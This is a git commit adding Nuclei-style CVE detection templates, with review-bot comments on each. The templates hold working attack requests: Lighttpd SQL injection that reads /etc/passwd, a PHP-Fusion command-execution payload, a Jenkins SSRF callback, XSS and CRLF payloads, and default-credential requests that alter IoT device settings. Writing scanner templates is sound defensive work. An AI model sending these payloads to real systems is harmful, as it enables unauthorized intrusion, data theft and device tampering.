More CVEs Template

patch-1
sandeep 2021-07-26 22:48:45 +05:30
parent 5fc3ae4ef4
commit 9c66387f0f
12 changed files with 327 additions and 0 deletions


@ -0,0 +1,21 @@
id: CVE-2014-2323
info:
name: Lighttpd 1.4.34 SQL injection and path traversal
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host: [::1]' UNION SELECT '/
unsafe: true
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
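Review bot: the raw request has no `Connection: close` header, unlike the CVE-2021-3377 raw request later in this commit, so a keep-alive server can leave the scanner waiting for the read timeout before the matcher runs; add `Connection: close` after the `Host:` line. The regex `root:[x*]:0:0:` is fine as written (the class matches one `x` or `*`, covering both shadowed and starred root entries), but because the injection lives in the `Host` header the template deliberately never uses `{{Hostname}}`, and a one-line comment saying so would stop a later maintainer from "fixing" it.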


@ -0,0 +1,28 @@
id: CVE-2016-0957
info:
name: Adobe AEM Console Disclosure
author: geeknik
description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
severity: high
tags: cve,cve2016,adobe,aem
requests:
- method: GET
path:
- "{{BaseURL}}/system/console?.css"
header:
- Authorization: "Basic YWRtaW46YWRtaW4K"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Adobe"
- "java.lang"
- "(Runtime)"
condition: and
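Review bot: `header:` followed by a list item is not the request-header field the engine reads; the CVE-2021-31250 template in this same commit uses the map form `headers:` with `Authorization:` as a key, and this template should match it, otherwise the credential is never sent (or the template fails to load under unknown-field validation). Separately, `YWRtaW46YWRtaW4K` decodes to `admin:admin` plus a trailing newline (the final `K` carries the `\n`); a server doing strict Basic parsing may reject that, so re-encode without the newline as `YWRtaW46YWRtaW4=`.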


@ -0,0 +1,22 @@
id: CVE-2018-1000600
info:
name: Pre-auth Fully-responded SSRF
description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
reference:
- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
author: geeknik
severity: medium
tags: cve,cve2018,jenkins,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
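Review bot: the description is missing words: `A exposure of sensitive information vulnerability` should read `An exposure of sensitive information vulnerability`, and `allows attackers to an attacker-specified URL` has lost its verb (the advisory sense is that the plugin connects to the attacker-specified URL). The `name:` also omits the product; `Jenkins GitHub Plugin - Pre-auth Fully-responded SSRF` would follow the naming style of the other templates here. Matching on `interactsh_protocol` is the right choice for a server-side fetch, since the response body need not reflect anything.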


@ -0,0 +1,26 @@
id: CVE-2020-24949
info:
name: PHPFusion 9.03.50 Remote Code Execution
author: geeknik
severity: high
description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
tags: cve,cve2020,phpfusion,rce,php
requests:
- method: GET
path:
- "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "infusion_db.php"
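Review bot: the description says the issue requires an authenticated non-admin user, but the request carries no session cookie or login step, so either the description overstates the prerequisite or the template cannot work against a real install; reconcile the two. The payload also executes `ls` on the target rather than only probing, so the template should carry the `intrusive` tag that nuclei-templates uses for checks with side effects, and the body match on `infusion_db.php` alone will also fire on any page that merely mentions that filename; pairing it with a second token from the directory listing would tighten the match.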


@ -0,0 +1,26 @@
id: CVE-2020-9402
info:
name: Django SQL Injection
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
reference: |
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
- https://docs.djangoproject.com/en/3.0/releases/security/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9402
author: geeknik
severity: high
tags: cve,cve2020,django,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
matchers:
- type: word
words:
- "DatabaseError at"
- "ORA-29257:"
- "ORA-06512:"
- "Request Method:"
condition: and
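Review bot: `reference: |` turns the two list-looking lines under it into a single literal string (`- https://...\n- https://...`) rather than a YAML list; the CVE-2018-1000600 template in this commit uses the plain list form (`reference:` followed by `- url` items) and this one should too, so tooling that reads references gets URLs instead of a text block. The request also probes `{{BaseURL}}/?q=...`; since the injected value has to reach a GIS function on an Oracle backend, a short comment on which endpoint the vulhub reference exposes at `/` would help maintainers understand why the root path is used.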


@ -0,0 +1,31 @@
id: CVE-2021-24291
info:
name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
author: geeknik
description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
severity: medium
tags: cve,cve2021,xss,wordpress,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- "onmouseover=alert(document.domain)//"
- "wp-content/uploads/photo-gallery"
condition: and
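Review bot: the description lists `gallery_id`, `tag`, `album_id` and `theme_id` as the affected parameters, but the request injects via `shortcode_id`; if `shortcode_id` is also reflected the description should say so, otherwise the probe targets a parameter the advisory does not cover. The second word matcher is sound: requiring both the unencoded `onmouseover=alert(document.domain)//` and the `wp-content/uploads/photo-gallery` path ties the reflection to this plugin rather than to any page that echoes the query string.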


@ -0,0 +1,26 @@
id: CVE-2021-31249
info:
name: CHIYU TCP/IP Converter devices - CRLF injection
author: geeknik
description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
severity: medium
tags: cve,cve2021,chiyu,crlf,iot
requests:
- method: GET
path:
- "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- "Location: setting.htm"
- "<script>alert(document.domain)</script>"
condition: and
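Review bot: the payload's `%0d%0a%0d%0a` terminates the header block, so the injected `<script>` tag lands in the response body, yet the second matcher looks for it with `part: header`; combined with `matchers-condition: and` that makes the template miss a successful split. Match the script tag in the body (drop `part` so the default body part applies) and keep `Location: setting.htm` in the header check. The request also submits `type=dev_name_apply` and `B_mac_apply=APPLY` with IP fields, which applies settings on the device rather than only reading a page, so the `intrusive` tag belongs here.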


@ -0,0 +1,28 @@
id: CVE-2021-31250
info:
name: CHIYU IoT XSS
author: geeknik
description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
severity: medium
tags: cve,cve2021,chiyu,xss,iot
requests:
- method: GET
path:
- "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
headers:
Authorization: "Basic OmFkbWlu"
redirects: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "\"><script>alert({{randstr}})</script>"
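Review bot: `Authorization: "Basic OmFkbWlu"` decodes to `:admin` (empty username, password `admin`), so this check only works while the device still has that default credential; say so in the description, because a device with a changed password is reported clean even when the XSS is present. As with the CRLF template above, `type=ap_tcps_apply`, `TF_ip=443`, `max_tcp=3` and `B_apply=APPLY` write TCP-server settings to the device, so tag it `intrusive`, and `redirects: true` should be paired with `max-redirects` to bound the follow. Using `{{randstr}}` in both payload and matcher is good practice: it avoids matching a static string left in a cache by an earlier scan.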


@ -0,0 +1,27 @@
id: CVE-2021-31581
info:
name: Akkadian Provisioning Manager MariaDB Credentials
author: geeknik
reference:
- https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
- https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
severity: medium
tags: cve,cve2021,akkadian,mariadb,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/database/pme/phinx.yml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "host:"
- "name:"
- "pass:"
condition: and
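Review bot: this template has no `description:` while every other template in the commit does; add one stating that `pme/database/pme/phinx.yml` exposes the MariaDB connection settings. The word matcher on `host:`, `name:` and `pass:` is generic enough that any YAML or INI-like page with those three keys satisfies it; anchoring on a phinx-specific key such as `environments:` or `adapter:` alongside `pass:` would cut false positives without weakening the check.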


@ -0,0 +1,32 @@
id: CVE-2021-33221
info:
name: CommScope Ruckus IoT Controller Unauthenticated Service Details
author: geeknik
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
severity: medium
tags: cve,cve2021,commscope,ruckus,debug
requests:
- method: GET
path:
- "{{BaseURL}}/service/v1/service-details"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: word
words:
- "message"
- "ok"
- "data"
- "dns"
- "gateway"
condition: and
- type: status
status:
- 200
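Review bot: `ok`, `data` and `message` are short tokens present in most JSON API responses; `dns` and `gateway` carry the real signal, and the `and` condition plus the `application/json` check keep this acceptable, but matching a key only this endpoint returns (the description mentions NTP servers and the controller version) would be stronger. Typo in the description: `that the devices uses` should read `that the device uses`. The tag `debug` does not describe an information-disclosure endpoint; `disclosure`, as used by the CVE-2021-31581 template in this commit, is the consistent choice.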


@ -0,0 +1,29 @@
id: CVE-2021-3377
info:
name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference: |
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
requests:
- raw:
- |+
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}}
Connection: close
unsafe: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
words:
- "com\"/onmouseover=\"alert(1)\">"
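Review bot: inside a `|+` literal block YAML does not process backslash escapes, so `\u001B` and `\u0007` reach the request as the six-character texts `\u001B` and `\u0007`, not as the ESC (0x1b) and BEL (0x07) bytes that ansi_up needs to recognise the OSC 8 hyperlink sequence; unless the engine unescapes them itself, the matcher on `com"/onmouseover="alert(1)">` can never fire. Verify by capturing what the scanner actually sends, and if the escapes go out literally, produce the control bytes another way (a double-quoted YAML scalar does decode `\u001B`). Two smaller points: `reference: |` yields one string rather than a list (same issue as CVE-2020-9402 above), and the template has no `tags:` field at all; add something like `tags: cve,cve2021,xss,ansi_up` so it is selectable like the rest.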


@ -0,0 +1,31 @@
id: CVE-2021-33904
info:
name: Accela Civic Platform 21.1 - 'servProvCode' XSS
author: geeknik
description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
reference: https://www.exploit-db.com/exploits/49980
severity: medium
tags: cve,cve2021,accela,xss
requests:
- method: GET
path:
- "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
- 'servProvCode'
condition: and
- type: status
status:
- 200
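Review bot: the first word matcher expects `"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"` with a quote on each end, i.e. it assumes the value is reflected inside a double-quoted HTML attribute that the injected `"` closes; if the platform reflects `servProvCode` into another context (a text node or a JavaScript string) the raw payload is still present but this exact string is not, and the template reports clean. Matching the decoded payload `k3woq"^confirm(document.domain)^"a2pbrnzx5a9` without the surrounding quotes still requires the unencoded `"` to appear, which is the actual escaping failure, and covers both contexts. The `text/html` header check and the `servProvCode` word are good context anchors and should stay.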